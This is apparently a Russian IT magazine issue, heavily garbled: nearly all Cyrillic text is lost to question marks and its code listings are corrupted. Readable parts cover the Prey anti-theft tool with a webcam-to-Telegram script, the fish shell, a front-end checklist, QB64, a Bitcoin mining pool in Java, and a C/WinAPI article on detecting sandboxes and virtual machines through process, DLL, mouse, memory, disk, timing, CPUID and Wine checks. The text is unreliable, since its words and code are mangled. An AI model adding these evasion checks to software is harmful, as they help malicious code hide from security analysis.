Find爉y爄Phone.�?�???�??�???,�??????�??�?????�?�??�??�??�?�??�????�
??��???�????,�???�?????�??�???�?????,�??�???�??�??�???�?��??�??
????�???�??�??????.
??�?� ??� ???�??� ???????� ?� ????� ???�?� ??????�???� Prey.� ??� ???�????
???� ??????�??� ?� ???�??� ??� ????� Windows,� macOS� ?� Linux.� ???� ????�???�?
???�?????� ????�??,� ?????�?� ????� ??� ????�???� ???�????,� ????�?� deb??????
?�???�??�???�?�??:
$爏udo燿pkg�i爌rey_1.7.3_amd64.deb
?燗rch燣inux燩rey�???�燗UR:
$爕aourt�S爌rey?node?client
????�?� ???�???� ?????� ?� ????,� ???� ????�????�?� ?� ???�???� ??� ???� ???�??
prey_project.
???�?�???�??�?�????�????�???,�????�???�??�?????�??:
$爏udo爌rey燾onfig燼ccount爏etup
??�???�??�???�爀mail?????�?,�??�????�???�?�?????,��?�???�???�???�
??� ?????� ?????�???.� ???�?� ???�?????,� ???� ???� ??????�?,� ??????�??
?� ??????????� ???????�??� ?� ???�????�???� ???�????????� ?????�?????
??????�???��?????�????�???�??�???.
???�???�??� ???�??� Prey� ???�???�?� ??????� ???�?????�????� ??????�???,
???????�??� ??� ??� ?� ??????,� ????�???� ???�?????�??,� ???�?????�???
??????�???,� ???�???� ????�?� ???????� ???� ?????�???.� ???�?� ????????� ????�
????????�??�???�??�??��??�?????�??�?,�??�??�?�??�???�???�??�????
?�????.
???�?� ????� ?� ????,� ???� ?� ????�??� ??� ????�??�??,� ???????� ??� ?????�?
????�?� ???�??�???� ?� ??????�??� ????� ?� ?????� ????�??� ????�?� ???�????
??????,� ????�??� ????� ???????�?� ?� ?????�?� ?� ????�?� ???�??�???�?� ?� ??????�
???� Wi?Fi??????� ????�?� ???�?� ???�??????� ????�?????�?.� ???�???� ???�???,
???�?�??�?�???�??�???�???�?,�??�??�?�??�?�??????.
??�?��???�???��?????�??????�??燩rey
?????�??�?????�?�??
???�???�????�???�?��??�?????�?�??�???��??�???�?.�????�??,�?
????�??�???�??��?????,�??????�??�??????�??????,�??�??�???�???�??
???� ???� ?� ????�???� ??????�???�?� (???�??,� ????�???� ??????,� ???� ???�???�??,
????�?�?????�???爏lock).�????�??�?�??�??�??�?????�???.
???� ??????� ???????� ??????,� ???????� ?????� ??????� ???�?� ?� ???????
??????�???�???.�?�????�???�?�???�??:
#!/bin/sh
ffmpeg�y�t�f爒ideo4linux2�s�0x480�r��i�/dev/video0�f�
image2�$HOME/webcam.png�
??�???�??爐ake_photo,�?????��??????爚/bin��??�??�?�?�??????�??:
$燾hmod�+x爚/bin/take_photo
??�???�??�???�???????�?????,�??????�????�????�???�??�?????�??�?
???�??�????�??�?.�??�?:
#!/bin/sh
if燵�$1�爌ost燷�&&燵�$2�爏uspend燷;爐hen
牋爏udo�u�???_???_?_???????�/home/????_???_?_???????/bin/take_p
hoto
fi
??�???� ???� 00take_photo,� ??????� ?� ???????� /lib/systemd/system?sleep/
?�??�?�??�?�??�??�?�?�??????�??:
$燾hmod�+x�/lib/systemd/system?sleep/00take_photo
??�???�??�??�??�??�??�????�???�??�????�?????�???��??�?????�??
?� ????� ~/webcam.png.� ??� ??� ?????� ???�?� ???� ????�?� ?� ?????�???� ????
????��????�??.�??�??�?�???�??�???�?爐elegram?cli.�??�?�??�?�??�???�
????�燗rch燣inux:
$爕aourt�S爐elegram?cli?git
??�??�???� ???�???� ?????�??� telegram?cli,� ???� ???�????� ?????� ??????�?
(phone爊umber:)��??�???�+71234567890,��????�??�??????�????�?�??
?�?????,�???�?�?????�???�?.
??�??�??�???�??�????�??�?????爚/bin/take_photo:
#!/bin/bash
ffmpeg�y�t�f爒ideo4linux2�s�0x480�r��i�/dev/video0�f�
image2�$HOME/webcam?`date`.png�
sleep�
telegram?cli�W�D�e�"send_photo燖????_???_?_?????????�$HOME/webcam.
png燻date`"
??�???� ??� ??� ????�?� ?????� ??????� ????,� ??� ?� ?????�??� ???� ?� ???� ?????�??.
?????�?� sleep� 60� ???�?� ???� ?????�??� ?????�??� ?????� ??????�??,� ???�?
????�??�????�??�??�???�?�燱i?Fi.
??????
??�?????� ????�??� ??� ???� ????�?,� ???� ????�??�?,� ???????� ??????�???� ????�
?????�????� ???�??????� ?� ????�???�?� ?� ???????� TEE???????,� ??????
??� ????�??�?� ????�?� ?� ???�?� ???�???????� ?????�???�??� ??� ????� ?????
?????.�?,�??�????�????�??�??�??,�??�??�??��?????,�?�???�?�???�
????�??�???,�??�??�??�??�??�?????.
?????
??????�?????????
????????????
apismenny@gmail.com
1
FISH燬HELL��?????�??燘ASH��?????�?�??????
?�????????
???� ???�?� ????�???� ?� ???,� ???� ?????�???� ????�?� ??� ????????
?� ??????�?????????�?????�??� ?????,� ?� ??????�?,� ???� ???�?� ???
????� ??� ???�??.� ????�?� ?????�?� ????�???� ????�???� ???� ??� ???????
??�???�??�???�???.�??�????�??�??�?�??�??�???�?� ?sh�????
????????燯X�????�???�???�?�???�?�??�?�?????�??��??????.
???�??�?�???�??�???�???�??�???�??�??�?�??�??:牜??????????
????,�??�??�??�??????�??�????!�
????�sh
???�?� ????????� ???�??????� ?sh� ???????�???�?:� ???�?� VGA,� ?????�
?????�????,� ????�??� ???�???�?� �?� ?????�?�,� ???�?????� ???�???
?????�??????,� ???�???�?� ???� ???????�??� ??????� ?� ???�???�?
??�??�??�?.
???� ??????� ?????� ?????�??� ????�??� ??� bash� ?� ???,� ?????�?,
????�????�????:� ?????�???�?� ???� ????,� ???� ?� ???�????� ??????
?� ????� ???????�?� ?� ???.� ???�????,� ????� ????????� ls� ?� ?� ??????
Tab,� ??� ?sh� ???????� ???�??� ???�??� ???????�??� ?� ????�???�??,
??????�???�?�???�???爉an.
???� ????� ?sh� ???�????�?� ????� ??� ????�??� ?� ????�???�?� ???� ????�
???�????�????�?��????�??�??�??�??,��??�?�?�???�??�???�?
???�?????.
???�????,�?�????�??�???�??�???�?,�??�?�??�????�??�???�
????�?� ?????� ???�???.� ???� ???????� ???�???�???�?� ???�????� ????�
????�?????�??�??�???燯nix,�?�??�?�????�???�?�???????
fish_config,� ??� ??� ???�?� 8000� ???�????�?� ???????�??� ?� ???�????�
????��????�???�???�??�??�?.
?�????,�???�???�?�??�??�??�?�???爖sh�?�??�?�????�??�?,
???� ???�?� ????� ?????� ???�??????� ??� ?sh� ???�???.� ??� ??????� ????�
??????� ?� ??�????�????,� ?� ????� ???�???� ????�?� ?� ???�???� ??????
?????�?�?�sh,�?�??�????�??�??�???燾ookbook.
2
FRONT-END燙HECKLIST��?????�????,�??�????
???????�????�???????�????
??�?� ????????�?� ????????� ???,� ???� ???�?� ????????,� ???�??�???
?�??�??�??�???�???�????�??,�??�????�???�???,�?�??�??�???�
??????�??� ???�??.� ????�?� ???� ???�????�???� ?� ?????�?� ???????
???????�?� ???� ???�???�?� Front?End� Checklist� ?� ????�??????� ????
???�????�?燝ithub�?�??�??�???�?�??�?.
???�??� ???????� ??� ???�???:� ???,� ???� ????� ?� ???� Head� (????� meta,
?????�??��?�????�??),�??�??�???�???燞TML,�??�???�?�????�
???,� CSS,� ????�???�??� ???�????,� JavaScript,� ???????�????,� ????�
??????�??�??�???�?????�??�?,�??�???????�燬EO.
????�???�??� ???�???� ????�???� ????�???� ??� ?????�??� ?????�?
?� ????????� ??� ???�???� ???�??�???� (low,� medium,� high),� ???�?� ????
?????�?,� ??� ???� ?????�?� ?� ???�??� ???�???.� ???�??� ??????�??
??�??�??�??�?,�???�??�??�???�(???�???�???�??�???�???!).
?� ????�?� ??????�??�??� ???�??� ????�?� ??� ????� ?????????�?.� 30
Seconds爋f燙SS��??�???��??�?????�????�??�??�??,�??????
???�?� ???�???� ???� ??????� CSS.� ???�??� ?� ?� ??????�???� ????�
?????��???�?????�?�??�?????�???.
3
QB64��????????燪UICKBASIC,�??????�????�?
????????�?????????
??�?� ??� ?????� ???�??�?� ???�????�?� ???�???� ??� ?????� ????�??,
??� ???????� ???�????�?� ???�???� ???�???????� ???�?????� ??� ???�??
FOR..NEXT,� ???�??,� ????� ?????� ???�???� (???� ???� ???????� ?????�?)
????�???��??,�??�????�?????燪uickBASIC�??�?�??�???.
???�?????,� ????�??� ???�??� ???�????�?� QuickBASIC� ???�?
?� 1990� ????.� ?????� ???� Microsoft� ???????� ???� ???�??� ?� ??????�??
????� ?????� ???�????�??� Visual� Basic,� ???????� ??� ???�????� ?????�
?????�?�燰B.Net,�???�??�?�??�?�??�??�??�??�?�?????.燪Ba?
sic� ?� ???�??�??� ???�??� QuickBASIC� ???� ???�?????�?� ?� ???�????�
????�燤S?DOS�??�???????�??�?,�?�??�?????�??燤S?DOS?
?�07�???�??�??�??牜???�????�??粻????�????�???�???�????�
??� ?� ???�???� QB64.� ?� ????� ???�???� ?????�???�?� ???,� ?� ???� ??
??� ???�?� ?� ?????�???� ?� ???????�??� ????.� ???�??�??� ?????� ????�
???????� ????�?,� ???�????�?� ???� ??????� ?� ???�????�?� ?� PNG
?�??????�燤P3,�??�?????�???�?�?�???�???�???,�???�?????
???�???,� ???�??�??� ?????� ?,� ???� ??????�??�?,� ???�???????� ????�
??????�???��????�????�??�?????��??�????�??�?????.
???� ????� QB64� ??� ???�??� ????????� ???�????�??�?� ??� ???�?
????�??� ?� ???�??�?� ???�?????�?� ???�??� ????�????:� ???� ??
�?????�,� ????�?� ?� ?????� ???�??� ???,� ???????� ??� ?????� ????�?
?� ????�??�????� ???�??.� ?� ??� ?????� ???�???,� ???,� ??????� Windows,
QB64� ??????�?� ?� Linux� ?� macOS?� ?????� ????�?� ??????�??� ????
???�?????�?????.
???���???:�??�??�??燨penGL��??�??�?????�?�???????
???�????
?� ????� ???�???� QuickBASIC� ???�???�??� ????�????,� ???????� ???
??????�?�?�??�?????牜????�??粻?牜???�?????�,�?燪B64�??�???�?
clang�?????�???�???�?�??�???�??.��13�???�?????�???�????
???�???� ???�????�??� ????� ??� QB64� ?� ????�???????� ??� ?� �??�?�,
??�?�??�??�???�???�??�?????�??��?�????�???.
??�???,� ???�??� ???�???� ???�???�??�????,� ??� ???�???� ??� ???
??????�??�??�??�??????�???�??�????.
??????
??????
?????????
??????�?????????,
????????�?�?????????
?燬ANDBOX?????????
Nik燴erof
xtahi0nix@gmail.com
??�???� ?????�?????�??� ???�???�??� ???� ??� ???�??�???�?
?� ???�????�????� ?????,� ???� ?� ??????� ????�??????:� ????
????�????� ??????�?� ?� ???�???�??�??� ???�?,� ???� ?????
????�???,� ???� ??� ??????�??� ?????� ?????�?????� ?????�???
???�????�??�??�???�?,�???�??�???�???,�??�???�????�
?????� ???�???�???� ?????�???� ?????�??�?� ???????� inter?
net� security.� ???� ???� ???�?,� ????�???�??� ???�?� ???�????
????�????� ?� ?????�??� ?????,� ???????� ??????�?� ?� ????�
?????�????� ?????,� ?� ???�??�????.� ?� ????� ??????� ?� ??????,
???� ???�????�???� sandbox????�????� ?� ??????� ???� ??????�
??????�?�??�??�????.
INFO
Sandbox� (?????�???)� ?� ???�???�??�??� ????�???�
????�??�?,��??????�???�???��??�??�???�???
?????�????�??�??�??????�??�???�?�??�????�
?????.�??�??�???,�???�???�???�?��???�???�
????�?????燱inAPI,�??????�???�???�?�??�??
?� ???�???�????,� ???�??�?????� ?????,� ?????�
????�??� ???�???� ??????,� ?� ???�?� ???�??� ?� ????
?� ???�???�???�??�??� ?????�???� ???�???�????
???�???.� ???�???�???� ???�?� ??????�???�?
???� ?????�?� ??????�??�???� ????� ?� ???� ???�???
????�???.
?????????�?????????�???????
??�?� ????� ?????�??� ???� ????�???????�?� ?????�??,� ??� ???� ????????� ??????�
??????�??.�??�?�???�?�???�???�??�???�?��???�?�????�?????�?�???�
???�??.� ???� ???�?� ??????�???� ???�???,� ???????� ???????�??� ???� ???�??�?
?�???�????燩ID�??�???�?�??�????.
DWORD爂etPIDproc(char�*爌ProcName)
{
牋燞ANDLE爌Handle�燙reateToolhelp32Snapshot(TH32CS_SNAPPROCESS,�;
牋爄f(pHandle�=燦ULL)爎eturn�
牋燩ROCESSENTRY32燩rocessEntry;
牋燚WORD爌id;
牋燩rocessEntry.dwSize�爏izeof(ProcessEntry);
牋燽ool燣oop�燩rocess32First(pHandle,�&ProcessEntry);
牋爄f(Loop�=燦ULL)爎eturn�
牋爓hile�(Loop)
牋爗
牋牋牋爄f�(strstr(ProcessEntry.szExeFile,爌ProcName))
牋牋牋爗
牋牋牋爌id�燩rocessEntry.th32ProcessID;
牋牋牋牋牋燙loseHandle(pHandle);
牋牋牋牋牋爎eturn爌id;
牋牋牋爙
牋牋牋燣oop�燩rocess32Next(pHandle,�&ProcessEntry);
牋爙
牋爎eturn�
}
??�???�????�???燙omodo營nternet燬ecurity:
if(getPIDproc("cmdvirth.exe"))爏td::cout�<�"Comodo爏andbox燿etected!
\n";
???�???� cmdvirth.exe� ????�?????�?� ???�????�????� ?� Comodo� Internet� Se?
curity.�?�???�?�???�???�??�?�??????�???�????�???燬andboxie:
if(getPIDproc("SbieSvc.exe"))爏td::cout�<�"Sandboxie燿etected!\n";
?� ?????,� ???� ????�??� ???????.� :?)� ????� ???�???� ??� ?????� ???�??,� ???�???
???�??� 0,� ?� ????�??� if� ??� ?????� ?????�???.� ???�?� ???�???� ???�??� 0,� ????
???�?????�???�???��?????�???�??�???�??�??�?��??�?????�???�???
???�??�?� Process32First� ????� ?� ??????�???� ??????� ????�???� ???�??�?
CreateToolhelp32Snapshot.
?????????�???????????�?????��????�???????
????????????
???�??� ????�??�??� ????� ?� ????�??????� ???�??�??�??� ??????� ?� ????????
????�????�??� ?????� ????�????� ??� ????�??� ?????�???� ???????� ?????�??.
???�???� ???� ???�????� ??� ??????� ???�??�?� ???� ??????� WinAPI????�???
GetModuleHandle:
BOOL燾heckLoadedDll(LPCWSTR爌DllName)
{
牋燞MODULE爃Dll�燝etModuleHandle(pDllName);
牋爄f(hDll)爎eturn燭RUE;
}
???�??�?�?�????�???燙omodo營nternet燬ecurity:
if�(checkLoadedDll(L"cmdvrt64.dll"))爏td::cout�<�"Comodo爏andbox�
detected!\n";
???�??�????�?燬andboxie:
if�(checkLoadedDll(L"sbiedll.dll"))爏td::cout�<�"Sandboxie燿etected!
\n";
???�???� GetModuleHandle()�??�???�?�??????燚LL��???????�???�?????�
???�?????�??�?�??�??�?.�???�??�???�?�??????�?????,�?�??�??�???
????,�???�??�?�??�???�???.
???�?�?????�??�??�??�??�??�??�??????��??�??�??�??�??�?,�??�?
????????�??�????,�??�??�??�???燱inAPI� OpenProcess,�????�??????�???
???�??�??�??�??��??�??�?�?????��??????�??�???� EnumProcessMod?
ules� (?� ???� ???�???� ????????� ???????�??� ?????)� ?,� ???????,� ????????� ????�
?????�?????��??????�??�???燱inAPI燝etModuleFileNameEx.
????????????�?????
???� ??????,� ????� ??� ??� ???�?� ????� ???�??�?,� ?????� ????�?� ?????�
???????????�???� ?????� ??????�??????� ????� ???�???,� ???� ?????� ????�?
??� 100%� ???????�???� ???�??�?� ???????�??� ?????�???,� ????� ???� ?????
????????� ??� ????�?� ????,� ?????� ???�???� ???� ????� ???�??�?,� ???�??�??�??
??????,�????�???�???�???�???�???�??�???�??.�??�???,�??????�????
???????�???� ?????,� ?� ???????�??� ??????�?????� ??� ????�???� ??????????
???�???� ???� ???�???� ??????�????:� ???� ????�?� ?????� ???�???�????,� ???
?????�???�???,�??�?�??????�?��??�???�??�??�??�?.
???�??� ???�??� ???�????�?� ????�???�??� sandbox????�????� ????�??
??� ??????�??�??� ??????�??.� ??� ?????�???,� ???� ???�?� ?????�?� ?????� ?????�
?????�??�?????�???�?????�??�?,��???�??�??�???�??,�?�??�?�????�
????????,� ???� ?????�???� ??� ??????�???�?.� ????�??� ????�?????� ???�???�?
?????�?????�??�??�???�??�??�???:�???�???�?????�?�???�???,�??�?
???�???�???�???��???�?�???,�??�??�????�???�???�?�????�???.
BOOL爉ouse_motion()
{
牋爄nt燾ount��
牋燩OINT爉ouse_coordinate1�爗};
牋燩OINT爉ouse_coordinate2�爗};
牋燝etCursorPos(&mouse_coordinate1);
牋燬leep(1500);
牋燝etCursorPos(&mouse_coordinate2);
牋爄f�((mouse_coordinate1.x�=爉ouse_coordinate2.x)�&&�
牋牋牋�(mouse_coordinate1.y�=爉ouse_coordinate2.y))
牋牋牋�++count;
牋燝etCursorPos(&mouse_coordinate1);
牋燬leep(1500);
牋燝etCursorPos(&mouse_coordinate2);
牋爄f�((mouse_coordinate1.x�=爉ouse_coordinate2.x)�&&�
牋牋牋�(mouse_coordinate1.y�=爉ouse_coordinate2.y))
牋牋牋�++count;
牋爄f(count��爎eturn燭RUE;
牋牋牋爀lse爎eturn燜ALSE;
}
?�???�??�???�?�????�??�??????�??�???�?�??�???�????�?�??�??�,
????� ?� ????????� ???????� ???�???� ??� ????� ??????�????� ???�???�?� ????,
????�?� ?????,� ???,� ???�??� ???�?,� ?????�????� ????� ???� ???�???�??� ???�??
???�???�??�??�??�?.
PEB�->燦UMBEROFPROCESSORS
???�???�??�??� ???�?� ???�?� ???�???� ???�?� ???�??�????,� ???�?� ??� ??????
???� ?????�?� ?????�??�?.� ???�????,� ?????�???� ?????� ???�???�???� ?????�
????�??� ???�??�??.� ??� ??� ???�?� 2018� ???,� ?� ????� ?� ??????�??� ???�????
?????�??�??�?��?????�?�???�?,�??�??�??�?�????�??�?????,�????�?
????�??�??�???�????�???�???�????.�???�???�??�?�???,�?�??�????
???�????�????.
???�??�???�??�???爔64:
PULONG爌rocNum��(PULONG)(__readgsqword(0x60)�+�B8);牋�//燚WORD�
NumberOfProcessors;
???爔86:
PULONG爌rocNum��(PULONG)(__readfsdword(0x30)�+�64);牋�//燚WORD�
NumberOfProcessors;
????� ???� ??????�?� ?????�????� ????� NumberOfProcessors� ??� PEB� (Process
Environment燘lock).�?????�??�?�??�?????�??�?�??�??�????:
if�(*procNum��牋std::cout�<�"NumberOfProcessors�=�爉ay燽e�
sandboxed!\n";
????????�?????�??????????�?????
???�??� ?????�??� ????�??� ???�???�????� ?� ???� ?????� ???????�??� ???�?????�
???�?????.��???�??�??�?�??�?�??�???�?��????????�?�??????�???
???�????�?,� ??????� ???� ???�??� ???�???�??� ???�?� ???� ????�??�??.� ???
???�????�??�?????�????�????�??�??�?.
BOOL燾heck_memory()
{
牋燤EMORYSTATUSEX爉em_stat�爗�;牋牋
牋爏tatex.dwLength�爏izeof(mem_stat);
牋燝lobalMemoryStatusEx(&mem_stat);
牋爄f(mem_stat.ullTotalPhys��(1024LL�*�(1024LL�*�(1024LL�*�L))))�
return燭RUE;
牋爀lse爎eturn燜ALSE;
}
?????????�????????�????
??�?�??�?�?�??�???�??�??�??�????,��???�?�??�?????�??�????�?,
??�???�???�??????�???,�??�??�??�??�??�???�??�????�???.��???�???�
????� ??� ????�?????�?,� ???� ????�????� ??????�?� ?� ???�????,� ????� ???�????
????�?��????.
BOOL燾heck_freespace()
{
牋燣PCWSTR爈pDirectoryName�燦ULL;
牋燯LARGE_INTEGER爈pTotalNumberOfBytes;
牋燘OOL燽Stat�燝etDiskFreeSpaceEx(lpDirectoryName,燦ULL,�&lpTota
lNumberOfBytes,燦ULL);
牋爄f�(bStat)�
牋爗
牋牋牋爄f�(lpTotalNumberOfBytes.QuadPart��(30ULL�*�(1024ULL�*�(
1024ULL�*�(1024ULL)))))
牋牋牋牋牋爎eturn燭RUE;
牋牋牋爀lse爎eturn燜ALSE;
牋爙
}
???????�??????-?????
??�??�???� ?????�??� ????�?� ???�???�???�?� ?� ?????�??� ?� ?????�?� ????�?
?????�???� ??????� ????�????.� ??� ?????� ??????�?????� ???�???????�?
???� ????,� ???�?� ??????,� ??????�???�?� ???�????� ???�???�????� ???� ???.� ????
??�???�????��????�???�???????????�??�?????�????,�??????�?�??�??
???�???� ?????� ????????� ?????�???�?,� ?� ?� ???�???�???� ???�?� ?????�??
?????� ????�???� ?????�???.� ????� ???�???� ??????,� ??� ???�?� ????�???????,
???� ??????�???�?� ?????�???.� ??� ?????� ????� ?????�?,� ???�????,� ?????�???
Sandboxie.
BOOL燾heckTiming1()
{
牋爑nsigned燺_int64燾ounter1,燾ounter2,燾ounter3;
牋爄nt爄��
牋燿o
牋爗
牋牋牋燾ounter1�燺_rdtsc();
牋牋牋燝etProcessHeap();
牋牋牋燾ounter2�燺_rdtsc();
牋牋牋燙loseHandle(0);
牋牋牋燾ounter3�燺_rdtsc();
牋牋牋�//�???????�????????�??????�?????????燙loseHandle�燝etPro
cessHeap()
牋牋牋爄f�(�(燣ODWORD(counter3)�燣ODWORD(counter2)�)�/�
牋牋牋牋牋�(燣ODWORD(counter2)�燣ODWORD(counter1)�)�=�)
牋牋牋牋牋爎eturn燭RUE;
牋爙爓hile�(i��爄��;爄++);
牋爎eturn燜ALSE;
}
??�??????�??�???�????�????�??�???� CloseHandle�� GetProcessHeap()
???�??�???�??�?��.�???�???�????�???�?,�???�?�????��??????
????�??�??�??????��???�???�????�???.
???�?� ?????�???� ?????� ????�???�?????� ???????� ???�???� ?� ???�????,
????�???�???� ??????� ???�???� Sleep().� ????� ???�???� ??????� ???�???
?????�????�?�?????燬leep()��??�?,�?�?�??�??�??.
BOOL燾heck_sleep()
{
牋�//�?????????????�?????�????
牋燚WORD燾ounterStart��
牋燚WORD燾ounterEnd��
牋燚WORD燿ifference��
牋燾ounterStart�燝etTickCount();牋//�???????�????�?�?????�
Sleep();
牋燬leep(100000);�//�???????�?�0�?????
牋燾ounterEnd�燝etTickCount();牋//�????????�????�????�?????
牋燿ifference�燾ounterEnd�燾ounterStart;牋//�?????????�????????�
?????????
牋爄f燿ifference��000)�//�???????????�?�???�??????,�???????�
???????????
牋牋牋爎eturn燜ALSE;
牋爀lse牋牋return燭RUE;
}
???????�?????�???????????
??�??�???�???�????�?????�??�????�???��???�??�???�???�??????????�
???,� ??� ????�?� ??� ????�?????� ?????�?????� ?????� ???� ???????� ???�???�??
__cpuid.�??�??�?????�?��??�??�???�??�??��??�???,�??????�?�???�
?????�???.�?�?????�?�?????�?�????�?????�????�???� cpuInfo,�??????
???�???� ??� ???????� ?????,� ??????�?????� ?� ?????�???� ???�??�???� EAX,� EBX,
ECX� ?� EDX.� ??� ????� ???�?� ??????� ???�??� ?????�???� cpuInfo� ?� ???�?� func?
tion_id,�??????�??????�????�?,�????�???�?�??????�??�??�???�????�
??.�??�???�??�????�???�??爔64?,�??�爔86?????�??�???.�?�??�????�???�
?????�??�?????�???�??:
void燺_cpuid(牋
牋爄nt燾puInfo[4],牋
牋爄nt爁unction_id牋
);�
??�?�???????�??�?��???� function_id��??�??????,�??�?????�?�??
???��????�??燛CX�????�???� cpuInfo,�?�??�?�?????��??�???�???�?????�
??????.�???,�??:
BOOL燾heck_cpuid()
{
牋營NT燾puInfo[4]�爗�1爙;�//�????????�????????燾puInfo��
??????????????�?
牋燺_cpuid(cpuInfo,�;�//�??????????�?????
牋爄f�((cpuInfo[2]�>�)�&��
牋牋牋爎eturn燭RUE;�//�????????�?????�??��????????燾puInfo
}
??�???� ???�?,� ?????�???� ?????�?????� ?????�???�???� ???� ??,� ???� ?� ??????�
????:�??�?�???�?�??�??????�?�??�??�?�??�????�?????�?????��????�
???.� ?????� ???�???�?� ???????�???� ?????�????� Virtual� PC� ???� ??????� ????�
????,� ???????� ??� ??????�?� ????,� ?� DWORD� getPIDproc(char� *�
pProcName).� ????�?� ??????�??� ?� ???� ???� ???�??� ???�??�??,� ?????�?????
???燰irtual燩C:
if(getPIDproc("VMSrvc.exe")爘|爂etPIDproc("VMUSrvc.exe"))爏td::cout�
<�"Virtual燩C燿etected!\n";
???�?�??�?�??�??�????�????燙itrix燲en:
if(getPIDproc("xenservice.exe"))爏td::cout�<�"Citrix燲en燿etected!\n
";
??�???� ???�?????,� ???� ???????�???� ?????�?????� ??� ?????�?????� ???????
?� ????�??.� ???� ???�?� ???????� ??????�??� ???�???,� ???????� ???????� ???
????�?????,�??�???�????�??????�???�???�?燱ine.
BOOL燾heck_wine_registry_key()
{
牋燞KEY爌hkResult�燜ALSE;
牋爄f�(RegOpenKeyEx(HKEY_CURRENT_USER,燺T("SOFTWARE\\Wine"),燦ULL,�
KEY_READ,�&phkResult)�=燛RROR_SUCCESS)
牋牋牋爗
牋牋牋牋牋燫egCloseKey(phkResult);
牋牋牋牋牋爎eturn燭RUE;
牋牋牋爙
};
??????????
???� ??� ?� ?????�???,� ???� ????�?????� ?????�???� ???�???�??�??� ???�?� ????�
????� ???�???�?.� ???� ??� ???� ??� ???�?????� ???????,� ??� ??� ??????� ??????
??????�??�??�?�????�??????�???�?,�???�??�???�???�?????�???�???�??
(?�??�????,��???�?)�??�???�????.
??????
MINING
POOL ??燡AVA
gogaworm
?????�??????�?????
???????牜?????�
gogaworm@tut.by
?????�?????????????
??????????????
??�????� ???�?� Bitcoin� ???�???� ?� ????,� ???� ????� ?� ?????
?????�??� ????�?� ?� ???????� ????�??�??�???� ???�???� ???�?
???�?????�?� ?????� ?????�?.� ???� ????�???� ??????� ????�????�
???�???�???????�??�?�???�??�???�??�??�?�???�?????
?� ???�????� ?????� ?????�??�?� ?,� ???� ???�???,� ??????�???
?�??�??�????�??�????�???�?.
????????�?????��??????�?????????????
?�????�??�???�?????�?�?�??�???�??�??�?��????�?�??????�??�????�
??� ?� ????�?????�?� ???????� ???????�????.� ???� ???� ???�????????� ??� ???�?
???�??�???�??�???�??�???�?�??�??,�??�?��??�???????,�??�?????�???�
??� ?????�??� ???�??�???�??� ?� ???�???� ????�?� ????.� ?� ???????,� ????� ???????
???????� ?� ?????� ????�???� Bitcoin� Core.� ???�??�???�??� ?� ?????� ?????
??????�?� ?????� ???�?� ???�???� ?� ???�?� ??� ???�?,� ?????�?� ???� ??????� ????�
?????�?��??�?????�??�??�?�?????�?????�??�????�???� testnet,�??????
????�??�??�?� ???�???� ??� ???????�??� ?� ????�????�?.� ?????�???� UI?????�
????�??� Bitcoin� Core� (testnet)� ?� ????,� ????� ?????�????� ???�??�???�??.
?� ????�?????� ???� ??????� ?????� ????�?????�?� ???�???�??� ???�????
bitcoind.
???� ????�??� ?� bitcoind� ??????�???�?� ???�????� JSON?RPC.� ???� ?????
????�??� ???�????� ??????� HTTP,� ???�???�???� ????????� ??????� ???�???,
??????�??燡SON,�??�?�???????�??�?????��??????�?.
??�???�????��????�??????�????�??�???????�??�??�????�燽itcoind
?????�???.� ???�?� ??� ????�???,� ???�?� ???�???� ????� bitcoin.conf� ?� ??????�?
Windows:� %APPDATA%\Bitcoin\� (???�????,� C:\Users\username\AppData\
Roaming\Bitcoin\bitcoin.conf)� ???� Linux:� $HOME/.bitcoin/� (???�????,� /
home/username/.bitcoin/bitcoin.conf).� ???????� ????� ???�?� ?????
?燝itHub.�??????��??��????�???�?�??�?????�??????�?:
#�??????�??????�???????????�???????�???,��?�????????
testnet=1�
#�??�???????????��?????,�??????�?,�????�???????�?�??????
rpcuser=rpcuser
rpcpassword=rpcpassword
???�?�??�?????�??�???�?,�??�?�??�???�?????�?�??????�??�????� bit?
coin?cli.� ???�????,� ?????�??� ?????�?� getinfo� (????�???????�?� ?????�??
bitcoind).�??�?????�??�????�???�?????�??�?�??�??????�??.
???燡SON?RPC????�??�??????,�?????�??�???�????燰ert.x,�?????�??�?
????�??,� ???� ??????�?� ????� ???�?� ?� ?� ???� ?????�???�?� ???� ????�??????
???�??�???.
????,�??�???燞TTP????�??.燘itcoind�?????�???�??????�????�?????�??,
?????�?�??�????�???�燘ase64�???�?��??????��??????.
client�爒ertx.createHttpClient();
requestOptions�爊ew燫equestOptions()
牋牋牋�.setHost(host)
牋牋牋�.setPort(port)
牋牋牋�.setURI("/");
base64Key�燘ase64.getEncoder().encodeToString((user�+�':'�+爌assword
).getBytes());
??�??�???�??�????�??�?????�??????燽itcoind.�????�?????�???��???
?????�?�燡SON????�???�爃andler,�??�?�????�?????�?�??????�??�????
??�??�???.
private爒oid爀xecuteRpc(String燾ommand,爁inal燞andler<Buffer>爃andler
)爗
牋燾lient
牋牋牋�.post(requestOptions,爎esult�>爗
牋牋牋牋牋爄f�(result.statusCode()�=�0)爗
牋牋牋牋牋牋牋爎esult.bodyHandler(handler);
牋牋牋牋牋爙爀lse爗
牋牋牋牋牋牋牋燬ystem.out.println("Failed燿o爌ost燽ecause�"�+爎esult
.statusMessage());
牋牋牋牋牋爙
牋牋牋爙)
牋牋牋�.putHeader(HttpHeaders.CONTENT_TYPE,�"application/json")
牋牋牋�.putHeader(HttpHeaders.AUTHORIZATION,�"Basic�"�+燽ase64Key)
牋牋牋�.putHeader(HttpHeaders.CONTENT_LENGTH,燬tring.valueOf(command
.length()))
牋牋牋�.write(command)
牋牋牋�.end();
}
??�?????� ?????�?,� ???????� ???� ??????�??�?,� ?� ???� ????????� ??????
?�????�???�?????.�?�???�?�??�???�?????��?�????�????,�??�???�??
???�?????�??�???�??�??�?.�??�????�??,�??�???�?????�???�?�????�?
???�??,��??????�??�??�?�??????�??�??�???�???�????�?.�??�??�???
???�???�?�??????�?��???�?�???�?????.�?????�??�???��???????�??
???????�?�??�?,�??�????�?????�?�???�?�????�???.�?�??�?�??�??????�
????�?�?????�??�??�??�???�??????.
??�???�??�??�???�?�??�???�??�????:
? ???�??�(????�???�?�??�??�?????�??�??�?),
? ???�??????�?�??�???�???�??�?,
? ??�???�??�??�(???�???�???�?????,�???�??�??��???),
? ???�?�??�????�??�?,
? bits� (??????�????�??� ???�??� ?????�???� ???�?????�???� ???�????� ????
???�?),
? nonce�(???�?????�??�??�????).
???�?????�?�??????�?
???�??�??????�??�??�???�?�???????�????�?爂etblocktemplate.
executeRpc(new燡sonObject(ImmutableMap.of(
牋牋牋�"id",�"1",
牋牋牋�"method",�"getblocktemplate",
牋牋牋�"params",�"",
